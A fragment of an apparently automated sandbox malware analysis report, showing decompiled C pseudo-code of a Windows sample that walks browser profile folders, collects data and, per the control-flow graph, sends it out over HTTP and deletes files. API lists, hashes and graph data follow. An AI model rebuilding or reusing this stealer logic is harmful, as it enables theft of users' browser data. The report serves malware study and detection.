                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t617 =  *((intOrPtr*)( *0x40e13c))(_t617, L"Default");
                                                                                                                                                                        							_v88 = _t617;
                                                                                                                                                                        						}
                                                                                                                                                                        						PathCombineW(_t461, _v96, _t617);
                                                                                                                                                                        						_t292 = FindFirstFileW(_t461,  &_v744); // executed
                                                                                                                                                                        						_t655 = _t292 - 0xffffffff;
                                                                                                                                                                        						if(_t292 != 0xffffffff) {
                                                                                                                                                                        							_t591 = 0x40;
                                                                                                                                                                        							_t302 = LocalAlloc(_t591, ??); // executed
                                                                                                                                                                        							_v24 = _t302;
                                                                                                                                                                        							_t304 = LocalAlloc(_t591, 0x200000); // executed
                                                                                                                                                                        							_v64 = _t304;
                                                                                                                                                                        							_t306 = LocalAlloc(_t591, 0x800000); // executed
                                                                                                                                                                        							_v36 = _t306;
                                                                                                                                                                        							_t308 = LocalAlloc(_t591, 0x400000); // executed
                                                                                                                                                                        							_v84 = _v84 + 1;
                                                                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                                                                        							_v60 = _v60 & 0x00000000;
                                                                                                                                                                        							_v32 = _t308;
                                                                                                                                                                        							_t310 =  *((intOrPtr*)( *0x40e044))(_t591, 0x400, 0x200000);
                                                                                                                                                                        							_v20 = _t310;
                                                                                                                                                                        							_t312 =  *((intOrPtr*)( *0x40e044))(_t591, 0x1000);
                                                                                                                                                                        							_v40 = _t312;
                                                                                                                                                                        							E00401C87(_v96, _t617,  &_v44,  &_v80,  &_v28, _a12); // executed
                                                                                                                                                                        							_t592 = _v80;
                                                                                                                                                                        							_t618 = _v44;
                                                                                                                                                                        							E004027B8( &_v24,  &_v16, _t655, _v96, _v44, _v80, _a4); // executed
                                                                                                                                                                        							E00402CB8( &_v36,  &_v16, _t655,  &_v24, _v44, _v80, _a4); // executed
                                                                                                                                                                        							E00403760( &_v32, _t618, _a4); // executed
                                                                                                                                                                        							_t470 =  &_v64;
                                                                                                                                                                        							E00403236( &_v64,  &_v16, _t655,  &_v32, _t618, _t592, _a4); // executed
                                                                                                                                                                        							_t648 = _t644 + 0x48;
                                                                                                                                                                        							_t321 = lstrlenW( *0x40e21c);
                                                                                                                                                                        							_t322 = _v36;
                                                                                                                                                                        							_v52 = _t322;
                                                                                                                                                                        							if(lstrlenW(_t322) >= _t321) {
                                                                                                                                                                        								_t382 = E0040A503(_v52, _t461);
                                                                                                                                                                        								_t556 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t384 = E0040A503(E0040A503(_t382, _t556), _v16);
                                                                                                                                                                        								_t558 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t470 = E0040A503(E0040A503(_t384, _t558), _v28);
                                                                                                                                                                        								_v12 = 1;
                                                                                                                                                                        								_t387 =  *0x40e220; // 0x6ec2f0
                                                                                                                                                                        								_v112 = _t387;
                                                                                                                                                                        								_t388 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        								_v108 = _t470;
                                                                                                                                                                        								_v104 = _t388;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_v52 = _t470;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        							}
                                                                                                                                                                        							_t324 = lstrlenW( *0x40e1a4);
                                                                                                                                                                        							_t325 = _v24;
                                                                                                                                                                        							_v56 = _t325;
                                                                                                                                                                        							if(lstrlenW(_t325) < _t324) {
                                                                                                                                                                        								_t621 = _v12;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t375 = E0040A503(_v56, _t461);
                                                                                                                                                                        								_t551 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t377 = E0040A503(E0040A503(_t375, _t551), _v16);
                                                                                                                                                                        								_t553 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t470 = E0040A503(E0040A503(_t377, _t553), _v28);
                                                                                                                                                                        								_t380 =  *0x40e1d8; // 0x6ed8d8
                                                                                                                                                                        								_v124 = _t380;
                                                                                                                                                                        								_t381 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        								_v120 = _t470;
                                                                                                                                                                        								_v116 = _t381;
                                                                                                                                                                        								_v56 = _t470;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_t621 = _v12 + 1;
                                                                                                                                                                        								_v12 = _t621;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t595 = _v32;
                                                                                                                                                                        							_push(_t595);
                                                                                                                                                                        							_v32 = _t595;
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e08c))() > 0) {
                                                                                                                                                                        								_t368 = E0040A503(_t595, _t461);
                                                                                                                                                                        								_t546 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t370 = E0040A503(E0040A503(_t368, _t546), _v16);
                                                                                                                                                                        								_t548 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t470 = E0040A503(E0040A503(_t370, _t548), _v28);
                                                                                                                                                                        								_t373 =  *0x40e22c; // 0x6ed5c8
                                                                                                                                                                        								_v136 = _t373;
                                                                                                                                                                        								_t374 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        								_v132 = _t470;
                                                                                                                                                                        								_v128 = _t374;
                                                                                                                                                                        								_v32 = _t470;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_t621 = _v12 + 1;
                                                                                                                                                                        								_v12 = _t621;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_v64);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e08c))() > 0) {
                                                                                                                                                                        								_t361 = E0040A503(_v64, _t461);
                                                                                                                                                                        								_t541 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t363 = E0040A503(E0040A503(_t361, _t541), _v16);
                                                                                                                                                                        								_t543 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        								_t470 = E0040A503(E0040A503(_t363, _t543), _v28);
                                                                                                                                                                        								_t366 =  *0x40e214; // 0x6eef00
                                                                                                                                                                        								_v148 = _t366;
                                                                                                                                                                        								_t367 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        								_v144 = _t365;
                                                                                                                                                                        								_v140 = _t367;
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                        								_t621 = _v12 + 1;
                                                                                                                                                                        								_v12 = _t621;
                                                                                                                                                                        							}
                                                                                                                                                                        							E00403C8F(_a8, _v40,  &_v60, _t470, _v44); // executed
                                                                                                                                                                        							_t644 = _t648 + 0xc;
                                                                                                                                                                        							if(_t621 != 0 || _v60 > _t621) {
                                                                                                                                                                        								_t334 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t336 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        								_t536 = 0x10;
                                                                                                                                                                        								_t337 = E0040A05F(_t334, _t536);
                                                                                                                                                                        								_v36 = _t337;
                                                                                                                                                                        								_t339 =  *((intOrPtr*)( *0x40e13c))(_t336,  *0x40e210);
                                                                                                                                                                        								_t598 = _v36;
                                                                                                                                                                        								_t340 = E0040A503(_t339, _t598);
                                                                                                                                                                        								_v68 = _v68 & 0x00000000;
                                                                                                                                                                        								_v24 = _t340;
                                                                                                                                                                        								_t341 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        								_v72 = _t341;
                                                                                                                                                                        								_t342 = E00408619( &_v24);
                                                                                                                                                                        								_v36 = _t342;
                                                                                                                                                                        								_t623 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        								_t476 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t598, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        								if(_t476 != 0) {
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_push(_t476);
                                                                                                                                                                        									_push(_t623);
                                                                                                                                                                        									_push(0xffffffff);
                                                                                                                                                                        									_push(_t598);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_push(0xfde9);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e0e4))() != 0) {
                                                                                                                                                                        										E00407EDB(_v100, _t623, _v12, _v20, _v60, _v40, _v36,  &_v72); // executed
                                                                                                                                                                        										_t644 = _t644 + 0x18;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_t623);
                                                                                                                                                                        								LocalFree(_v36);
                                                                                                                                                                        								LocalFree(_v24);
                                                                                                                                                                        								LocalFree(_t598);
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v56); // executed
                                                                                                                                                                        							LocalFree(_v52); // executed
                                                                                                                                                                        							LocalFree(_v32); // executed
                                                                                                                                                                        							LocalFree(_v20);
                                                                                                                                                                        							LocalFree(_v40);
                                                                                                                                                                        							_t617 = _v88;
                                                                                                                                                                        							_t589 = _v48;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t617);
                                                                                                                                                                        						_t294 = _v16;
                                                                                                                                                                        						if(_t294 != 0) {
                                                                                                                                                                        							LocalFree(_t294);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t589 = _t589 + 1;
                                                                                                                                                                        						_v48 = _t589;
                                                                                                                                                                        					} while (_t589 < 0x64);
                                                                                                                                                                        					LocalFree(_t461);
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					LocalFree(_v28);
                                                                                                                                                                        					LocalFree(_v80);
                                                                                                                                                                        					return _v84;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























































































































































                                                                                                                                                                        0x00401e2d
                                                                                                                                                                        0x00401e30
                                                                                                                                                                        0x00401e33
                                                                                                                                                                        0x00401e3c
                                                                                                                                                                        0x00401e3f
                                                                                                                                                                        0x00401e46
                                                                                                                                                                        0x00401e4e
                                                                                                                                                                        0x00401e55
                                                                                                                                                                        0x00401e5e
                                                                                                                                                                        0x00401e65
                                                                                                                                                                        0x00401e74
                                                                                                                                                                        0x00401e77
                                                                                                                                                                        0x00401e9a
                                                                                                                                                                        0x00401ea3
                                                                                                                                                                        0x00401ea5
                                                                                                                                                                        0x00401ea8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401eaa
                                                                                                                                                                        0x00401ebc
                                                                                                                                                                        0x00401ec3
                                                                                                                                                                        0x00401ecc
                                                                                                                                                                        0x00401ed3
                                                                                                                                                                        0x00401edc
                                                                                                                                                                        0x00401ee3
                                                                                                                                                                        0x00401ee6
                                                                                                                                                                        0x00401eef
                                                                                                                                                                        0x00401ef6
                                                                                                                                                                        0x00401eff
                                                                                                                                                                        0x00401f06
                                                                                                                                                                        0x00401f09
                                                                                                                                                                        0x00401f12
                                                                                                                                                                        0x00401f14
                                                                                                                                                                        0x00401f18
                                                                                                                                                                        0x00401f1c
                                                                                                                                                                        0x00401f1f
                                                                                                                                                                        0x00401f2a
                                                                                                                                                                        0x00401f33
                                                                                                                                                                        0x00401f3a
                                                                                                                                                                        0x00401f4d
                                                                                                                                                                        0x00401f5c
                                                                                                                                                                        0x00401f61
                                                                                                                                                                        0x00401f64
                                                                                                                                                                        0x00401f66
                                                                                                                                                                        0x004022a7
                                                                                                                                                                        0x004022aa
                                                                                                                                                                        0x004022b3
                                                                                                                                                                        0x004022bc
                                                                                                                                                                        0x004022c5
                                                                                                                                                                        0x004022ce
                                                                                                                                                                        0x004022d7
                                                                                                                                                                        0x004022dd
                                                                                                                                                                        0x004022e0
                                                                                                                                                                        0x004022e2
                                                                                                                                                                        0x004022e5
                                                                                                                                                                        0x004022e5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401f6c
                                                                                                                                                                        0x00401f6f
                                                                                                                                                                        0x00401f75
                                                                                                                                                                        0x00401f7e
                                                                                                                                                                        0x00401f92
                                                                                                                                                                        0x00401f9e
                                                                                                                                                                        0x00401faf
                                                                                                                                                                        0x00401fb2
                                                                                                                                                                        0x00401fbd
                                                                                                                                                                        0x00401fc6
                                                                                                                                                                        0x00401fca
                                                                                                                                                                        0x00401fce
                                                                                                                                                                        0x00401fd1
                                                                                                                                                                        0x00401fd3
                                                                                                                                                                        0x00401fd5
                                                                                                                                                                        0x00401fdc
                                                                                                                                                                        0x00401fe1
                                                                                                                                                                        0x00401ff3
                                                                                                                                                                        0x00401ff8
                                                                                                                                                                        0x00402015
                                                                                                                                                                        0x00402017
                                                                                                                                                                        0x0040201e
                                                                                                                                                                        0x00402023
                                                                                                                                                                        0x00402026
                                                                                                                                                                        0x0040202b
                                                                                                                                                                        0x0040202e
                                                                                                                                                                        0x00402031
                                                                                                                                                                        0x00402032
                                                                                                                                                                        0x00402035
                                                                                                                                                                        0x00402036
                                                                                                                                                                        0x00402036
                                                                                                                                                                        0x00402043
                                                                                                                                                                        0x00402047
                                                                                                                                                                        0x0040204b
                                                                                                                                                                        0x0040204e
                                                                                                                                                                        0x00402050
                                                                                                                                                                        0x00402052
                                                                                                                                                                        0x004020ba
                                                                                                                                                                        0x00402054
                                                                                                                                                                        0x00402059
                                                                                                                                                                        0x0040205e
                                                                                                                                                                        0x00402070
                                                                                                                                                                        0x00402075
                                                                                                                                                                        0x00402093
                                                                                                                                                                        0x00402095
                                                                                                                                                                        0x0040209a
                                                                                                                                                                        0x0040209d
                                                                                                                                                                        0x004020a2
                                                                                                                                                                        0x004020a8
                                                                                                                                                                        0x004020ab
                                                                                                                                                                        0x004020ae
                                                                                                                                                                        0x004020af
                                                                                                                                                                        0x004020b0
                                                                                                                                                                        0x004020b4
                                                                                                                                                                        0x004020b5
                                                                                                                                                                        0x004020b5
                                                                                                                                                                        0x004020bd
                                                                                                                                                                        0x004020c6
                                                                                                                                                                        0x004020c9
                                                                                                                                                                        0x004020cb
                                                                                                                                                                        0x004020cd
                                                                                                                                                                        0x004020d3
                                                                                                                                                                        0x004020d8
                                                                                                                                                                        0x004020ea
                                                                                                                                                                        0x004020ef
                                                                                                                                                                        0x00402109
                                                                                                                                                                        0x0040210b
                                                                                                                                                                        0x00402113
                                                                                                                                                                        0x00402116
                                                                                                                                                                        0x0040211b
                                                                                                                                                                        0x0040211e
                                                                                                                                                                        0x00402121
                                                                                                                                                                        0x00402124
                                                                                                                                                                        0x00402127
                                                                                                                                                                        0x00402128
                                                                                                                                                                        0x00402129
                                                                                                                                                                        0x0040212d
                                                                                                                                                                        0x0040212d
                                                                                                                                                                        0x0040212e
                                                                                                                                                                        0x0040212e
                                                                                                                                                                        0x00402139
                                                                                                                                                                        0x0040213b
                                                                                                                                                                        0x0040213d
                                                                                                                                                                        0x00402144
                                                                                                                                                                        0x00402149
                                                                                                                                                                        0x0040215b
                                                                                                                                                                        0x00402160
                                                                                                                                                                        0x0040217a
                                                                                                                                                                        0x0040217c
                                                                                                                                                                        0x00402184
                                                                                                                                                                        0x00402187
                                                                                                                                                                        0x0040218c
                                                                                                                                                                        0x0040218f
                                                                                                                                                                        0x00402192
                                                                                                                                                                        0x00402195
                                                                                                                                                                        0x00402196
                                                                                                                                                                        0x00402197
                                                                                                                                                                        0x0040219b
                                                                                                                                                                        0x0040219b
                                                                                                                                                                        0x0040219c
                                                                                                                                                                        0x0040219c
                                                                                                                                                                        0x004021ad
                                                                                                                                                                        0x004021b2
                                                                                                                                                                        0x004021b5
                                                                                                                                                                        0x004021b7
                                                                                                                                                                        0x004021c2
                                                                                                                                                                        0x004021cf
                                                                                                                                                                        0x004021db
                                                                                                                                                                        0x004021df
                                                                                                                                                                        0x004021e4
                                                                                                                                                                        0x004021ef
                                                                                                                                                                        0x004021f8
                                                                                                                                                                        0x004021fa
                                                                                                                                                                        0x00402201
                                                                                                                                                                        0x00402206
                                                                                                                                                                        0x0040220d
                                                                                                                                                                        0x00402210
                                                                                                                                                                        0x00402215
                                                                                                                                                                        0x00402218
                                                                                                                                                                        0x00402222
                                                                                                                                                                        0x00402230
                                                                                                                                                                        0x00402246
                                                                                                                                                                        0x00402248
                                                                                                                                                                        0x0040224a
                                                                                                                                                                        0x00402260
                                                                                                                                                                        0x00402262
                                                                                                                                                                        0x00402264
                                                                                                                                                                        0x0040227f
                                                                                                                                                                        0x00402284
                                                                                                                                                                        0x00402284
                                                                                                                                                                        0x00402264
                                                                                                                                                                        0x00402288
                                                                                                                                                                        0x00402291
                                                                                                                                                                        0x0040229a
                                                                                                                                                                        0x004022a1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004021b9
                                                                                                                                                                        0x004021b9
                                                                                                                                                                        0x004021bc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004021bc
                                                                                                                                                                        0x004021b7
                                                                                                                                                                        0x00401e79
                                                                                                                                                                        0x00401e80
                                                                                                                                                                        0x004022eb
                                                                                                                                                                        0x004022eb
                                                                                                                                                                        0x004022ee
                                                                                                                                                                        0x004022f1
                                                                                                                                                                        0x004022fd
                                                                                                                                                                        0x00402304
                                                                                                                                                                        0x00402310
                                                                                                                                                                        0x00402312
                                                                                                                                                                        0x00402318
                                                                                                                                                                        0x00402335
                                                                                                                                                                        0x0040233b
                                                                                                                                                                        0x0040231a
                                                                                                                                                                        0x00402327
                                                                                                                                                                        0x00402329
                                                                                                                                                                        0x00402329
                                                                                                                                                                        0x00402343
                                                                                                                                                                        0x00402356
                                                                                                                                                                        0x00402358
                                                                                                                                                                        0x0040235b
                                                                                                                                                                        0x0040236d
                                                                                                                                                                        0x0040236f
                                                                                                                                                                        0x00402376
                                                                                                                                                                        0x0040237f
                                                                                                                                                                        0x00402386
                                                                                                                                                                        0x0040238f
                                                                                                                                                                        0x00402396
                                                                                                                                                                        0x0040239f
                                                                                                                                                                        0x004023a1
                                                                                                                                                                        0x004023a4
                                                                                                                                                                        0x004023a8
                                                                                                                                                                        0x004023b1
                                                                                                                                                                        0x004023ba
                                                                                                                                                                        0x004023c1
                                                                                                                                                                        0x004023ca
                                                                                                                                                                        0x004023d4
                                                                                                                                                                        0x004023e3
                                                                                                                                                                        0x004023e8
                                                                                                                                                                        0x004023ee
                                                                                                                                                                        0x004023fd
                                                                                                                                                                        0x00402411
                                                                                                                                                                        0x0040241d
                                                                                                                                                                        0x0040242e
                                                                                                                                                                        0x00402431
                                                                                                                                                                        0x0040243c
                                                                                                                                                                        0x00402445
                                                                                                                                                                        0x00402449
                                                                                                                                                                        0x0040244d
                                                                                                                                                                        0x00402454
                                                                                                                                                                        0x0040245b
                                                                                                                                                                        0x00402460
                                                                                                                                                                        0x00402472
                                                                                                                                                                        0x00402477
                                                                                                                                                                        0x00402494
                                                                                                                                                                        0x00402496
                                                                                                                                                                        0x0040249d
                                                                                                                                                                        0x004024a2
                                                                                                                                                                        0x004024a5
                                                                                                                                                                        0x004024aa
                                                                                                                                                                        0x004024ad
                                                                                                                                                                        0x004024b0
                                                                                                                                                                        0x004024b1
                                                                                                                                                                        0x004024b4
                                                                                                                                                                        0x004024b5
                                                                                                                                                                        0x004024b5
                                                                                                                                                                        0x004024c2
                                                                                                                                                                        0x004024c6
                                                                                                                                                                        0x004024ca
                                                                                                                                                                        0x004024d1
                                                                                                                                                                        0x00402539
                                                                                                                                                                        0x004024d3
                                                                                                                                                                        0x004024d8
                                                                                                                                                                        0x004024dd
                                                                                                                                                                        0x004024ef
                                                                                                                                                                        0x004024f4
                                                                                                                                                                        0x00402512
                                                                                                                                                                        0x00402514
                                                                                                                                                                        0x00402519
                                                                                                                                                                        0x0040251c
                                                                                                                                                                        0x00402521
                                                                                                                                                                        0x00402527
                                                                                                                                                                        0x0040252a
                                                                                                                                                                        0x0040252d
                                                                                                                                                                        0x0040252e
                                                                                                                                                                        0x0040252f
                                                                                                                                                                        0x00402533
                                                                                                                                                                        0x00402534
                                                                                                                                                                        0x00402534
                                                                                                                                                                        0x0040253c
                                                                                                                                                                        0x00402544
                                                                                                                                                                        0x00402545
                                                                                                                                                                        0x0040254c
                                                                                                                                                                        0x00402552
                                                                                                                                                                        0x00402557
                                                                                                                                                                        0x00402569
                                                                                                                                                                        0x0040256e
                                                                                                                                                                        0x00402588
                                                                                                                                                                        0x0040258a
                                                                                                                                                                        0x00402595
                                                                                                                                                                        0x0040259b
                                                                                                                                                                        0x004025a0
                                                                                                                                                                        0x004025a6
                                                                                                                                                                        0x004025a9
                                                                                                                                                                        0x004025ac
                                                                                                                                                                        0x004025ad
                                                                                                                                                                        0x004025ae
                                                                                                                                                                        0x004025b2
                                                                                                                                                                        0x004025b3
                                                                                                                                                                        0x004025b3
                                                                                                                                                                        0x004025b6
                                                                                                                                                                        0x004025c2
                                                                                                                                                                        0x004025c9
                                                                                                                                                                        0x004025ce
                                                                                                                                                                        0x004025e0
                                                                                                                                                                        0x004025e5
                                                                                                                                                                        0x004025ff
                                                                                                                                                                        0x00402601
                                                                                                                                                                        0x0040260c
                                                                                                                                                                        0x00402612
                                                                                                                                                                        0x00402617
                                                                                                                                                                        0x00402620
                                                                                                                                                                        0x00402626
                                                                                                                                                                        0x00402627
                                                                                                                                                                        0x00402628
                                                                                                                                                                        0x0040262c
                                                                                                                                                                        0x0040262d
                                                                                                                                                                        0x0040262d
                                                                                                                                                                        0x0040263e
                                                                                                                                                                        0x00402643
                                                                                                                                                                        0x00402648
                                                                                                                                                                        0x00402660
                                                                                                                                                                        0x0040266c
                                                                                                                                                                        0x00402670
                                                                                                                                                                        0x00402675
                                                                                                                                                                        0x00402680
                                                                                                                                                                        0x00402689
                                                                                                                                                                        0x0040268b
                                                                                                                                                                        0x00402692
                                                                                                                                                                        0x00402697
                                                                                                                                                                        0x0040269e
                                                                                                                                                                        0x004026a1
                                                                                                                                                                        0x004026a6
                                                                                                                                                                        0x004026a9
                                                                                                                                                                        0x004026b3
                                                                                                                                                                        0x004026c1
                                                                                                                                                                        0x004026d7
                                                                                                                                                                        0x004026db
                                                                                                                                                                        0x004026e4
                                                                                                                                                                        0x004026e5
                                                                                                                                                                        0x004026e6
                                                                                                                                                                        0x004026e7
                                                                                                                                                                        0x004026e8
                                                                                                                                                                        0x004026ea
                                                                                                                                                                        0x004026eb
                                                                                                                                                                        0x004026ec
                                                                                                                                                                        0x004026f5
                                                                                                                                                                        0x00402710
                                                                                                                                                                        0x00402715
                                                                                                                                                                        0x00402715
                                                                                                                                                                        0x004026f5
                                                                                                                                                                        0x00402719
                                                                                                                                                                        0x00402722
                                                                                                                                                                        0x0040272b
                                                                                                                                                                        0x00402732
                                                                                                                                                                        0x00402732
                                                                                                                                                                        0x0040273b
                                                                                                                                                                        0x00402744
                                                                                                                                                                        0x0040274d
                                                                                                                                                                        0x00402756
                                                                                                                                                                        0x0040275f
                                                                                                                                                                        0x00402765
                                                                                                                                                                        0x00402768
                                                                                                                                                                        0x00402768
                                                                                                                                                                        0x0040276c
                                                                                                                                                                        0x00402772
                                                                                                                                                                        0x00402777
                                                                                                                                                                        0x0040277a
                                                                                                                                                                        0x0040277a
                                                                                                                                                                        0x00402780
                                                                                                                                                                        0x00402781
                                                                                                                                                                        0x00402784
                                                                                                                                                                        0x0040278e
                                                                                                                                                                        0x00402797
                                                                                                                                                                        0x004027a0
                                                                                                                                                                        0x004027aa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004027b0

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,Default), ref: 00401E80
                                                                                                                                                                        • wsprintfW.USER32 ref: 00402335
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,?,00000000), ref: 00402343
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00402356
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00200000), ref: 0040236F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00200000), ref: 0040237F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00800000), ref: 0040238F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00400000), ref: 0040239F
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00402445
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00402450
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004024C2
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004024CD
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402719
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402722
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040272B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402732
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000), ref: 0040273B
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402744
                                                                                                                                                                        • LocalFree.KERNELBASE(?), ref: 0040274D
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00402756
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040275F
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040276C
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0040277A
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040278E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00402797
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004027A0
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004027AA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$lstrlen$Alloc$CombinePath$FileFindFirstGlobalwsprintf
                                                                                                                                                                        • String ID: 8{@$Default$Profile %d$hXo$xZm$x[m
                                                                                                                                                                        • API String ID: 3768013767-3070501738
                                                                                                                                                                        • Opcode ID: 65ecfa7065253902dcf107738d78f9766527f115974b6ff76e638b2714d6a83a
                                                                                                                                                                        • Instruction ID: 449fa844226801038b1647cac7188c5dd728cedc2e0ff5267019116776c59555
                                                                                                                                                                        • Opcode Fuzzy Hash: 65ecfa7065253902dcf107738d78f9766527f115974b6ff76e638b2714d6a83a
                                                                                                                                                                        • Instruction Fuzzy Hash: 30627071E00218AFDF04DFA6DE45AAEBBB5FF88310F10442AF914B7391DB7499118B99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 536 407edb-407f14 LocalAlloc 538 4080f3 536->538 539 407f1a-407f21 536->539 540 4080f5-4080f9 538->540 539->538 541 407f27-407f2b 539->541 541->538 542 407f31-407f36 541->542 542->538 543 407f3c-407f66 542->543 545 407f68 543->545 546 407f7c-407fa2 LocalAlloc 543->546 547 407f6a-407f7a 545->547 549 407fa8-407fae 546->549 550 408069-4080b4 LocalAlloc * 2 546->550 547->546 547->547 551 407fb0-408045 call 40a4c2 call 40a503 * 12 549->551 555 4080b6-4080d1 550->555 556 40811f-408133 LocalFree * 2 550->556 639 40804a-40805a LocalFree 551->639 563 4080d3-4080ed LocalFree * 4 555->563 564 4080fa-408104 555->564 558 408275-4082d0 call 40a55d * 4 lstrcpyn 556->558 559 408139-40813f 556->559 601 4082d2-4082dc 558->601 602 4082de-408329 LocalFree InternetSetOptionW * 2 558->602 562 408142-40820a LocalAlloc call 40a55d * 11 559->562 652 408236-40823a 562->652 653 40820c-408212 562->653 563->538 564->556 575 408106-408116 564->575 575->556 586 408118-40811c 575->586 586->556 601->602 611 408406-40843e MultiByteToWideChar 602->611 612 40832f-40835f 602->612 631 408440-408464 MultiByteToWideChar 611->631 632 408469-40846b 611->632 622 408365-4083a0 HttpOpenRequestW 612->622 623 4083ff-408400 InternetCloseHandle 612->623 627 4083a2-4083c6 HttpSendRequestW 622->627 628 4083f6-4083f9 InternetCloseHandle 622->628 623->611 641 4083c8-4083cd 627->641 642 4083ec-4083f3 InternetCloseHandle 627->642 628->623 631->632 633 408474-408490 LocalFree * 3 632->633 634 40846d-40846e LocalFree 632->634 633->540 634->633 639->551 645 408060-408066 639->645 643 4083da-4083ea 641->643 642->628 643->642 648 4083cf-4083d4 643->648 645->550 648->642 650 4083d6 648->650 650->643 654 408245-408249 652->654 655 40823c-40823f LocalFree 652->655 653->652 656 408214-408229 ReadFile 653->656 657 40824b-408257 DeleteFileW LocalFree 654->657 658 40825d-40826c LocalFree 654->658 655->654 659 40822b 656->659 660 40822e-408230 CloseHandle 656->660 657->658 658->562 661 408272 658->661 659->660 660->652 661->558
                                                                                                                                                                        C-Code - Quality: 55%
